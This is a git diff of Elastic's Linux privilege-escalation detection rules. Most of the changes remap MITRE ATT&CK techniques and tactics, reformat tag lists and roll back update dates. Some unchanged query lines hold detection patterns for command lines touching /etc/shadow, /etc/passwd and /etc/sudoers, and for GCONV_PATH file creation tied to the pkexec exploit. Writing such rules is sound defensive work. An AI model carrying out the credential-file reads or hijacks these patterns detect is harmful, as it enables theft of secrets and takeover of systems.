b/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml index 4258204ccb0..bfc29e3bbe6 100644 --- a/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml +++ b/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/28" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -87,7 +87,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -100,16 +112,29 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1222" -name = "File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique.subtechnique]] -id = "T1222.002" -name = "Linux and Mac File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/002/" +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml b/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml index 724edb03756..1e3ddd54ee1 100644 --- a/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml +++ b/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/01" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -119,11 +119,6 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml b/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml index a71a1c7ecf2..cbb17f3d837 100644 --- a/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml +++ b/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/01" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/15" [rule] author = ["Elastic"] @@ -118,16 +118,6 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.003" -name = "Sudo and Sudo Caching" -reference = "https://attack.mitre.org/techniques/T1548/003/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_dac_permissions.toml b/rules/linux/privilege_escalation_dac_permissions.toml index 0071f7af161..d6e99458e84 100644 --- a/rules/linux/privilege_escalation_dac_permissions.toml +++ b/rules/linux/privilege_escalation_dac_permissions.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -81,7 +81,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -111,42 +118,15 @@ process.command_line:(*/etc/sudoers* or */etc/passwd* or */etc/shadow* or */root framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" - -[[rule.threat.technique.subtechnique]] -id = "T1003.008" -name = "/etc/passwd and /etc/shadow" -reference = "https://attack.mitre.org/techniques/T1003/008/" - -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.004" -name = "Private Keys" -reference = "https://attack.mitre.org/techniques/T1552/004/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["process.name"] diff --git a/rules/linux/privilege_escalation_enlightenment_window_manager.toml b/rules/linux/privilege_escalation_enlightenment_window_manager.toml index e1b8b16be7c..163762f1cb3 100644 --- a/rules/linux/privilege_escalation_enlightenment_window_manager.toml +++ b/rules/linux/privilege_escalation_enlightenment_window_manager.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -102,23 +102,14 @@ Enlightenment, a Linux window manager, can be exploited for privilege escalation [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.001" -name = "Setuid and Setgid" -reference = "https://attack.mitre.org/techniques/T1548/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml b/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml index d4788a96ec1..d9f136f68e5 100644 --- a/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml +++ b/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -104,18 +104,24 @@ The CAP_SYS_PTRACE capability in Linux allows processes to trace and control oth [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [[rule.threat.technique.subtechnique]] id = "T1055.008" name = "Ptrace System Calls" reference = "https://attack.mitre.org/techniques/T1055/008/" + +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml b/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml index 054d95fe8dc..b03edb7d5b6 100644 --- a/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml +++ b/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -47,7 +47,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -97,18 +106,53 @@ GDB, a debugger, can be granted the CAP_SYS_PTRACE capability, allowing it to tr [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [[rule.threat.technique.subtechnique]] id = "T1055.008" name = "Ptrace System Calls" reference = "https://attack.mitre.org/techniques/T1055/008/" + +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/linux/privilege_escalation_kworker_uid_elevation.toml b/rules/linux/privilege_escalation_kworker_uid_elevation.toml index 7d5039f65fc..5c695d128cc 100644 --- a/rules/linux/privilege_escalation_kworker_uid_elevation.toml +++ b/rules/linux/privilege_escalation_kworker_uid_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -102,31 +102,31 @@ Kworker processes are integral to Linux, handling tasks like interrupts and back [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - -[[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.013" +name = "KernelCallbackTable" +reference = "https://attack.mitre.org/techniques/T1574/013/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml index a6d82d08750..046ac09030c 100644 --- a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml +++ b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] @@ -93,7 +93,15 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -116,28 +124,11 @@ id = "T1574.006" name = "Dynamic Linker Hijacking" reference = "https://attack.mitre.org/techniques/T1574/006/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml b/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml index b3d0de5378e..af3b13bbbe3 100644 --- a/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml +++ b/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -46,7 +46,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -110,24 +118,29 @@ Symbolic links in Linux are shortcuts that point to files or directories, facili framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml b/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml index a34e1b9a628..e2af607fc77 100644 --- a/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml +++ b/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -93,7 +93,20 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -109,11 +122,47 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1601" name = "Modify System Image" reference = "https://attack.mitre.org/techniques/T1601/" +[[rule.threat.technique.subtechnique]] +id = "T1601.001" +name = "Patch System Image" +reference = "https://attack.mitre.org/techniques/T1601/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml index 1fe818619b2..9df3d417f82 100644 --- a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml +++ b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -100,23 +100,31 @@ file where host.os.type == "linux" and file.path : "/*GCONV_PATH*" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" +id = "T1574.007" +name = "Path Interception by PATH Environment Variable" +reference = "https://attack.mitre.org/techniques/T1574/007/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml b/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml index 8859e41599e..57ae0855eb1 100644 --- a/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml +++ b/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2023/12/11" maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -83,29 +83,29 @@ Buffer overflow attacks exploit vulnerabilities in software to execute arbitrary [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" [rule.threshold] field = ["event.kind", "host.id"] value = 100 diff --git a/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml b/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml index 7aa6f9831f5..f7d626e37d7 100644 --- a/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml +++ b/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -84,7 +84,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -133,6 +141,11 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -147,3 +160,11 @@ reference = "https://attack.mitre.org/techniques/T1548/001/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml b/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml index 69a21b3669b..6073256d5ec 100644 --- a/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml +++ b/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -81,7 +81,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -116,6 +125,11 @@ not process.parent.executable in ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -130,3 +144,24 @@ reference = "https://attack.mitre.org/techniques/T1548/001/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Defense Evasion" +id = "TA0005" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" diff --git a/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml b/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml index 37598c101d8..c214967001f 100644 --- a/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml +++ b/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/28" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -81,7 +81,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", +] type = "eql" query = ''' sequence by host.id with maxspan=1s @@ -103,16 +113,24 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml b/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml index 11888270c0a..d916e1256e9 100644 --- a/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml +++ b/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -49,7 +49,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] 